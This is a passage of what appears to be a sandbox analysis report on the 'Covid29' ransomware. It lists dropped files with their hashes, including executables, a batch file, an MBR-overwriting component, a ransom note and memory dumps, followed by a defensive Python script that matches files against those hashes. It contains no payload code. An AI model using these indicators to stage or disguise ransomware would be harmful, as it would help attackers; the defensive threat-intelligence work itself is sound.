                                                            SHA512

                                                            72241573516bbb5523af8823ccab377c08e719819a77f4dd99387a9662c3a9bdbee12d88efaa7ea1d6a74ae17c147d394aa3c54a1cfcabf7fc57488e63c442cd

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                            Filesize

                                                            4KB

                                                            MD5

                                                            794a5f5d474334d7ab52abad0586cda1

                                                            SHA1

                                                            71415c46a98fea6f09e6d97aaff0c8c196451b89

                                                            SHA256

                                                            20e17f7b4741613b7b909ba40372a23579b04484ddb68be1933a7c7660a10cd7

                                                            SHA512

                                                            0e4462e8b7c88f91ecc61e89a26b079e52e735600521d72128761ff079ee43c44492751d2fb2556c3dabbad9047228c220d42011523fc01a3566935976542edb

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                            Filesize

                                                            1KB

                                                            MD5

                                                            0db0818b8201303e3498c773310cf35d

                                                            SHA1

                                                            9e20ac97a0173935460bdb02b80b8ed07f310272

                                                            SHA256

                                                            e5b8df3d436c3acf927bc7617b83a8d47ab520b69193242cbae308f6691e54a0

                                                            SHA512

                                                            5dbf475bb6b2282f5d10aec63a605ff2ab4faf92e428a4e2f32247b6f7fc90cc640c9dcd46749883e27be75aa9f7120a291960427a9d3c7712d18bf00ae055e9

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                            Filesize

                                                            59B

                                                            MD5

                                                            2800881c775077e1c4b6e06bf4676de4

                                                            SHA1

                                                            2873631068c8b3b9495638c865915be822442c8b

                                                            SHA256

                                                            226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974

                                                            SHA512

                                                            e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State~RFe584e88.TMP

                                                            Filesize

                                                            59B

                                                            MD5

                                                            78bfcecb05ed1904edce3b60cb5c7e62

                                                            SHA1

                                                            bf77a7461de9d41d12aa88fba056ba758793d9ce

                                                            SHA256

                                                            c257f929cff0e4380bf08d9f36f310753f7b1ccb5cb2ab811b52760dd8cb9572

                                                            SHA512

                                                            2420dff6eb853f5e1856cdab99561a896ea0743fcff3e04b37cb87eddf063770608a30c6ffb0319e5d353b0132c5f8135b7082488e425666b2c22b753a6a4d73

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                            Filesize

                                                            5KB

                                                            MD5

                                                            1f4b997bd28b67344d3fd8325c67a61c

                                                            SHA1

                                                            c93dcf10387989286b68d0b5898abc8f6b7f5aae

                                                            SHA256

                                                            6efde25474ba5f1cc6ca64bc969e4ae849a09ad55c7c3d6ed5fb5e71de64ec1c

                                                            SHA512

                                                            3985d263669ba737948dbae3d8cfeb72af88606abc0258ab6bc919240feda27d00f1e9a8481be5709c22aa9a9f3075d1b610c3c5945271466957affb12ef02b9

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                            Filesize

                                                            6KB

                                                            MD5

                                                            4390b5e67c3eb42ac389a3324111b818

                                                            SHA1

                                                            06be57f911dc6f84bf45dbf0840937365a120811

                                                            SHA256

                                                            1ac354667e319181365f3bab3fc27cbd1a21ea730188f0c6484517b5833592d8

                                                            SHA512

                                                            734e65911b45add1dc02e740bf9ec1dd51bc7789bb5c67d38667fb520bdcd34756c3b863e160d5fb162fcc7653f7330ae6afac9a08917dba4a4d06ad876c4c7b

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                            Filesize

                                                            6KB

                                                            MD5

                                                            bb90f40655d57864f1dc49f993c651fe

                                                            SHA1

                                                            f4be0f616538582a084163e88557cc88163ff293

                                                            SHA256

                                                            6fb114fe4b6d936b2761cc8249fdcddeea00ee16e2cd2752ebf22473b9f9c899

                                                            SHA512

                                                            4561388fda69f0c4d355c6f9af00b46f6c94a16faa0a7e65d27e3748c134f3def03bfafee98519108f4d34567705c308db5fb99963813dbf54a55bd859ace9bb

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                            Filesize

                                                            6KB

                                                            MD5

                                                            bebfc67aa7e236d22d0b96463bdd0955

                                                            SHA1

                                                            bc25df7c2ada4b1e8a0152f8f3854064404ba2c2

                                                            SHA256

                                                            8e02e17dbebfea624fb1c682bea5926bb985f9271bd12b3d82f9e216ecf5ebe7

                                                            SHA512

                                                            36c12323a3534edb5e376c954a4930cf4b8b1754b06401b7e68056560f10a44a4918303e6bd0efb3c80ba9269fadc84a7abef5c099cf11bb62a70218c3b1ba63

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                            Filesize

                                                            6KB

                                                            MD5

                                                            0bf5b3dc44f39248e9bed229ff4a418b

                                                            SHA1

                                                            e19d55ac665f094c9b2c7e7c0ef0f9097b67ddf5

                                                            SHA256

                                                            adbab17c6db43d8e10b8831fef206be7b990fa75b3bc423d032e3e51438c1215

                                                            SHA512

                                                            579996ae32509015e25298c1c6237db412bd6b6814f621d3a81e28985c68b1e0c8c5ae08fb338e12f9f0c2fe899fee72f1c6df172caaedc7bcbbcc1c357843fa

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                            Filesize

                                                            6KB

                                                            MD5

                                                            3f7897543349c78e6052187d4c11777b

                                                            SHA1

                                                            ffd7b6eb129a638f3bf992c69551b042c545c9db

                                                            SHA256

                                                            b31929d2b3ae8a723547eef2bfed3d7ac6340ff87a4c0ad5694b98f920dd8fde

                                                            SHA512

                                                            210ebc8acd79f48b6f4a7828a774b98f88e4fe48af8374956962c15fe393d710e0974ab3ced4f8f8501bd391c45446a996a16608b8d895c9152544d3b83e2035

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                            Filesize

                                                            24KB

                                                            MD5

                                                            90cc75707c7f427e9bbc8e0553500b46

                                                            SHA1

                                                            9034bdd7e7259406811ec8b5b7ce77317b6a2b7e

                                                            SHA256

                                                            f5d76f8630779de1fe82f8802d6d144861e3487171e4b32e3f8fffd2a57725fb

                                                            SHA512

                                                            7ad692bce11aee08bf65bb7c578b89a4a3024211ee1deaf671c925d65cc016943f2caad3d57b365e16d1764c78c36cae35c3c45cef0928dd611a565b0313e511

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                            Filesize

                                                            24KB

                                                            MD5

                                                            0d8c8c98295f59eade1d8c5b0527a5c2

                                                            SHA1

                                                            038269c6a2c432c6ecb5b236d08804502e29cde0

                                                            SHA256

                                                            9148e2a2ba2a3b765c088dc8a1bdcc9b07b129e5e48729a61ebc321cb7b8b721

                                                            SHA512

                                                            885a734a97a6f8c4a8fb5f0efa9fe55742f0685210472ed376466e67f928e82ddf91ba1211389d9c55dd1e03dc064aa7a81d1fca3cf429fbaf8f60db8b1348c6

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                            Filesize

                                                            1KB

                                                            MD5

                                                            8bda48dc651320d800e229c437114839

                                                            SHA1

                                                            985f7778b72df2049090dce65751067129d0e77c

                                                            SHA256

                                                            b1d5872cc821873933ca4178a317aef98a54592180aea4dd3fe191974fa88abf

                                                            SHA512

                                                            ae57ecda2bc127c18ae4941851e5f48368bbe1539b4a8aedc5773cf00afe4f900844760055a9aec54452974e1489a337b2f803676c0b937ede2c5c4ed4c3228c

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                            Filesize

                                                            1KB

                                                            MD5

                                                            52fd16f961d14bb1f981c6ac34c65a49

                                                            SHA1

                                                            91c7f63947ac4c9c6ee3dd4837f2721b4bc2c13b

                                                            SHA256

                                                            5ba250a56eb70b9a7562a0211fb29ce4766d84bd5d923cb0c951c4746bafd895

                                                            SHA512

                                                            d2f1ef2bae2eaee63113c1eabcfaecdedaa58cf77b9bdab61f42dc48be0decbd9305903ae397afde1574dbbe3375079d5c99924faa2fa5f7694d58c19a1832da

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                            Filesize

                                                            1KB

                                                            MD5

                                                            a74b08f24e8a571bd79d10a87d1b29f3

                                                            SHA1

                                                            a68d6faf72dbb9bd2b19790acd8aa9e39e6411a1

                                                            SHA256

                                                            f21916c2ef29f479c79ad16667df9c31499cd74952d993647d88b1b4e42093c4

                                                            SHA512

                                                            58d2e158d9239c074669f65293877f7d611856d3c300519eabf4bffcbe4c891b7e6bd17437930cd919fafb958878202d73656d0fe787b2ebea29b35e6152525a

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
  Filesize: 1KB
  MD5: 9c9c401f4b51b3e6842842e824ab00e6
  SHA1: 98a07925ac31fcaf83d4c0d5a76a73133a5ffaa3
  SHA256: 86370131df29a6b73c8153ea30554d670e9342604e07128512a78625663909d5
  SHA512: ff9d695e6cf05268d1902af073bcf644403216139da9c8f67dda2c6aa15878aa959a87fd6e9e97de9c540a800d84f19ab3e50a398adb062c7d9d7780d8ad96c0

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
  Filesize: 1KB
  MD5: a7f67f11281ceca60163ecc4c8c00502
  SHA1: bfe9fa682e0d0d5f6607014841cd5cf4f55558f6
  SHA256: ae4e4e0d95cff9ca64d60738afb20d9f3cf268f2e4e11b656e0ba65697ae97fb
  SHA512: 88c964daa9895aeb84c8ba7d02ec7a88118bc7534fe619ca506e2b3717abf12d84aeee5a91f246fd8d7150e8ee968c6dbbea167964ccc567754ad7ee2327ea91

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5829f9.TMP
  Filesize: 370B
  MD5: d6849ff15652f244563a85aa7d2812f6
  SHA1: 220cbcb343cca58d5ced959d86f04fd40dba7ad0
  SHA256: e0b408a73c08cd37dc3233d2ba4eca1a5f27fb51f09c6b77e9a767e211cc6638
  SHA512: bad4b408b49a6f7efc0da4b59d3f5e7130fcb09cb9e1f8ed603578b1f6811342def98763de061fb79d69aa9417e3192c152cf3bbfcf18cbfc1d702b4b789d4c6

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
  Filesize: 16B
  MD5: 206702161f94c5cd39fadd03f4014d98
  SHA1: bd8bfc144fb5326d21bd1531523d9fb50e1b600a
  SHA256: 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
  SHA512: 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001
  Filesize: 41B
  MD5: 5af87dfd673ba2115e2fcf5cfdb727ab
  SHA1: d5b5bbf396dc291274584ef71f444f420b6056f1
  SHA256: f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
  SHA512: de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT
  Filesize: 16B
  MD5: 46295cac801e5d4857d09837238a6394
  SHA1: 44e0fa1b517dbf802b18faf0785eeea6ac51594b
  SHA256: 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
  SHA512: 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
  Filesize: 8KB
  MD5: 44e4a763f98c94945aee146ff17e6741
  SHA1: 56f9cf8ba5211385bc2ec5e65b5900a7efecdea3
  SHA256: 5fc9265caf60ebcba6c997368e2b5412f5c9dc5f56c6b345392fbb686d60447d
  SHA512: 7552050ad7560e2221b72c3e4c95ce5cbb5780617c5e9a8b9adc02be9d7b27fdd361332257b471869a6385972c615cf9a1b2a7021581883c9b5f20b42c22e214

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
  Filesize: 11KB
  MD5: 386a6f68a7805a447d77d2d9f4d20fa8
  SHA1: 4141780e7dbde532c80777aa3af4aaae575d6d6c
  SHA256: 2804e5b859391aa5e924adf9da61c7820a29219c3bea2b99c01c791d62f09905
  SHA512: 6743cbd8ca375a93df84de391e706ffed6bae4a716bd2c8c336c4d5f949cc6b7a861d9407a7b3382a9cf6877944065f19fc3df7be55f443c75b7c4c269360430

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
  Filesize: 10KB
  MD5: ea192f3c9b7af44e25e1953296c5db98
  SHA1: b3102291fc929e50be76a50ff8c08f217083725a
  SHA256: 41d1181dadb09952066988a40f69bdc77ade14d4e0a0fec09b47fa832306984a
  SHA512: ddeee87ea4342878c19498c22f128c70ea297630d686b70af525d2f6a1b7949738e88994f16c8d26f2dfce70e65d7fef6f3c6a99c72a29ef0533389522b55e0c

• C:\Users\Admin\AppData\Local\Temp\C04D.tmp\Cov29Cry.exe.death
  Filesize: 103KB
  MD5: 8bcd083e16af6c15e14520d5a0bd7e6a
  SHA1: c4d2f35d1fdb295db887f31bbc9237ac9263d782
  SHA256: b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a
  SHA512: 35999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a

• C:\Users\Admin\AppData\Local\Temp\C04D.tmp\Cov29LockScreen.exe
  Filesize: 48KB
  MD5: f724c6da46dc54e6737db821f9b62d77
  SHA1: e35d5587326c61f4d7abd75f2f0fc1251b961977
  SHA256: 6cde4a9f109ae5473703c4f5962f43024d71d2138cbd889223283e7b71e5911c
  SHA512: 6f83dd7821828771a9cae34881c611522f6b5a567f5832f9e4b9b4b59bf495f40ad78678bd86cba59d32ea8644b4aa5f052552774fea142b9d6da625b55b6afc

• C:\Users\Admin\AppData\Local\Temp\C04D.tmp\TrojanRansomCovid29.bat
  Filesize: 1KB
  MD5: 57f0432c8e31d4ff4da7962db27ef4e8
  SHA1: d5023b3123c0b7fae683588ac0480cd2731a0c5e
  SHA256: b82e64e533789c639d8e193b78e06fc028ea227f55d7568865120be080179afc
  SHA512: bc082486503a95f8e2ce7689d31423386a03054c5e8e20e61250ca7b7a701e98489f5932eba4837e05ec935057f18633798a10f6f84573a95fcf086ee7cabcbf

• C:\Users\Admin\AppData\Local\Temp\C04D.tmp\fakeerror.vbs
  Filesize: 144B
  MD5: c0437fe3a53e181c5e904f2d13431718
  SHA1: 44f9547e7259a7fb4fe718e42e499371aa188ab6
  SHA256: f2571f03eb9d5ee4dca29a8fec1317ded02973c5dd233d582f56cebe98544f22
  SHA512: a6b488fc74dc69fc4227f92a06deb297d19cd54b0e07659f9c9a76ce15d1ef1d8fa4d607acdd03d30d3e2be2a0f59503e27fc95f03f3006e137fa2f92825e7e3

• C:\Users\Admin\AppData\Local\Temp\C04D.tmp\mbr.exe.danger
  Filesize: 1.3MB
  MD5: 35af6068d91ba1cc6ce21b461f242f94
  SHA1: cb054789ff03aa1617a6f5741ad53e4598184ffa
  SHA256: 9ac99df89c676a55b48de00384506f4c232c75956b1e465f7fe437266002655e
  SHA512: 136e3066c6e44af30691bcd76d9af304af0edf69f350211cf74d6713c4c952817a551757194b71c3b49ac3f87a6f0aa88fb80eb1e770d0f0dd82b29bfce80169

• C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk
  Filesize: 2KB
  MD5: f150906bd0fe42873c771cfca6736424
  SHA1: 5b23516be65dc50014fa9d040b3a3c3175c4ece4
  SHA256: b67f40ae6e1b3fe3b0aabd43e32ea7e993a4f21ae56757a9155ae467e805b1a7
  SHA512: 1694ed78bd2f6e3c8ad647d78efb42293b2a62f8ca9479e8e66ffdad32dde676a9647f035bb52f2993ddfc702851d19cc558cabe83debb46a16d5b976a2bd9f5

• C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
  Filesize: 3KB
  MD5: c66d40bf0610bf8bdeb6cdeff5b17b21
  SHA1: 3e281c5233e99a41c694f7f48a5721801617ec4d
  SHA256: 6fc457cd33a5bb6967413e84d3b418e4f0028adb629d80d45c2607c6b25194e5
  SHA512: ae67448a037414e9b4dc3c2b0fe82c30f190a3f70e1ddc646fc6fa239c09ee3d1172e08389cfa05e4c93db43ae3dbe2a798640c185a3822d45a52b3246c96f90

• C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
  Filesize: 3KB
  MD5: 0095ac4ff4c9418d8601f7347710f44d
  SHA1: 0e3879fa6c091febddcce6bf47424fb06b792316
  SHA256: 22308d089150452fff4302a6972679543642300a174ca7be45c525e7d1eeb516
  SHA512: 5fb47f65c6315564d73256ad10c6d3a6ca12f76c3859001bfe406e2b3b4ee0d70d6e0805e26eb0be02360dc48fb9a6d0bc7029f2a20b07a5e69a23da4bd7d12b

• C:\Users\Admin\Desktop\covid29-is-here.txt
  Filesize: 861B
  MD5: c53dee51c26d1d759667c25918d3ed10
  SHA1: da194c2de15b232811ba9d43a46194d9729507f0
  SHA256: dd5b3d185ae1809407e7822de4fced945115b48cc33b2950a8da9ebd77a68c52
  SHA512: da41cef03f1b5f21a1fca2cfbf1b2b180c261a75d391be3a1ba36e8d4d4aefab8db024391bbee06b99de0cb0b8eb8c89f2a304c27e20c0af171b77db33b2d12c

• C:\Users\Admin\Downloads\Covid29 Ransomware.zip
  Filesize: 1.7MB
  MD5: 272d3e458250acd2ea839eb24b427ce5
  SHA1: fae7194da5c969f2d8220ed9250aa1de7bf56609
  SHA256: bbb5c6b4f85c81a323d11d34629776e99ca40e983c5ce0d0a3d540addb1c2fe3
  SHA512: d05bb280775515b6eedf717f88d63ed11edbaae01321ec593ecc0725b348e9a0caacf7ebcd2c25a6e0dc79b2cdae127df5aa380b48480332a6f5cd2b32d4e55c

• memory/4048-843-0x0000000000400000-0x00000000004D8000-memory.dmp
  Filesize: 864KB

• memory/5332-931-0x0000000000400000-0x00000000005D5000-memory.dmp
  Filesize: 1.8MB

• memory/5332-813-0x0000000000400000-0x00000000005D5000-memory.dmp
  Filesize: 1.8MB

• memory/5332-937-0x0000000000400000-0x00000000005D5000-memory.dmp
  Filesize: 1.8MB

• memory/6012-844-0x0000000000C00000-0x0000000000C20000-memory.dmp
  Filesize: 128KB
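The dropped-file hashes and memory-dump names above are the part of this report a responder actually reuses. The Python below is an added example, not part of the sandbox output or of the sample itself: it sweeps a directory, flags any file whose SHA-256 matches one of the Covid29 payload components listed above (the Temp\C04D.tmp staging files, the ransom note and the downloaded archive; the Edge, LNK and jump-list entries are left out because those files change on every run), and it cross-checks each memory dump's reported size against the address range encoded in its file name. The scan root in the `__main__` block is a hypothetical target, and the `sample.bin` created by `make_demo_dir` is a constructed stand-in, not a real sample.

```python
import hashlib
import os
import re
import tempfile

# SHA-256 values copied from the dropped-files list above.
DROPPED_FILE_SHA256 = {
    "b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a": "Cov29Cry.exe.death",
    "6cde4a9f109ae5473703c4f5962f43024d71d2138cbd889223283e7b71e5911c": "Cov29LockScreen.exe",
    "b82e64e533789c639d8e193b78e06fc028ea227f55d7568865120be080179afc": "TrojanRansomCovid29.bat",
    "f2571f03eb9d5ee4dca29a8fec1317ded02973c5dd233d582f56cebe98544f22": "fakeerror.vbs",
    "9ac99df89c676a55b48de00384506f4c232c75956b1e465f7fe437266002655e": "mbr.exe.danger",
    "dd5b3d185ae1809407e7822de4fced945115b48cc33b2950a8da9ebd77a68c52": "covid29-is-here.txt",
    "bbb5c6b4f85c81a323d11d34629776e99ca40e983c5ce0d0a3d540addb1c2fe3": "Covid29 Ransomware.zip",
}

# memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp, the naming used in the report
_DUMP_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9a-fA-F]+)-0x([0-9a-fA-F]+)-memory\.dmp$")


def sha256_file(path, chunk=1 << 20):
    """Stream a file through SHA-256 so large archives never sit in memory whole."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def scan_dir(root, iocs=DROPPED_FILE_SHA256):
    """Walk `root`; return [(path, label)] for every file whose SHA-256 is in `iocs`.

    Files that cannot be opened (locked, access denied) are skipped instead of
    aborting the sweep, which matters on a host that is mid-encryption.
    """
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            try:
                digest = sha256_file(p)
            except OSError:
                continue
            if digest in iocs:
                hits.append((p, iocs[digest]))
    return hits


def dump_region(name):
    """Parse a dump name into (pid, start, end, size_kb); None if it is malformed."""
    m = _DUMP_RE.match(name)
    if not m:
        return None
    pid, _seq, start, end = m.groups()
    start, end = int(start, 16), int(end, 16)
    if end <= start:
        return None
    return int(pid), start, end, (end - start) // 1024


def check_dump_sizes(entries):
    """entries: [(dump_name, reported_size)] -> names whose reported size does not
    match the address range. The report rounds to whole KB or one-decimal MB, so
    the computed size is rounded the same way before comparing."""
    bad = []
    for name, reported in entries:
        region = dump_region(name)
        if region is None:
            bad.append(name)
            continue
        size_kb = region[3]
        computed = f"{size_kb}KB" if size_kb < 1024 else f"{size_kb / 1024:.1f}MB"
        if computed != reported:
            bad.append(name)
    return bad


def make_demo_dir():
    """Create a temp dir holding one constructed file (not a real sample) for a dry run.
    Returns (dir, file_path, sha256_of_file)."""
    d = tempfile.mkdtemp(prefix="ioc_demo_")
    data = b"constructed sample payload, not a real dropped file"
    p = os.path.join(d, "sample.bin")
    with open(p, "wb") as fh:
        fh.write(data)
    return d, p, hashlib.sha256(data).hexdigest()


if __name__ == "__main__":
    # the dump names and sizes exactly as the report lists them
    dumps = [
        ("memory/4048-843-0x0000000000400000-0x00000000004D8000-memory.dmp", "864KB"),
        ("memory/5332-931-0x0000000000400000-0x00000000005D5000-memory.dmp", "1.8MB"),
        ("memory/6012-844-0x0000000000C00000-0x0000000000C20000-memory.dmp", "128KB"),
    ]
    print("dump size mismatches:", check_dump_sizes(dumps))
    print("hits:", scan_dir(r"C:\Users\Admin\AppData\Local\Temp"))  # hypothetical scan root
```

Exact-hash matching only catches byte-identical copies of these components; a rebuilt archive or a re-packed Cov29Cry.exe will not hit, so treat the path names (the C04D.tmp staging directory, the covid29-is-here.txt note) as a second, weaker indicator alongside the hashes.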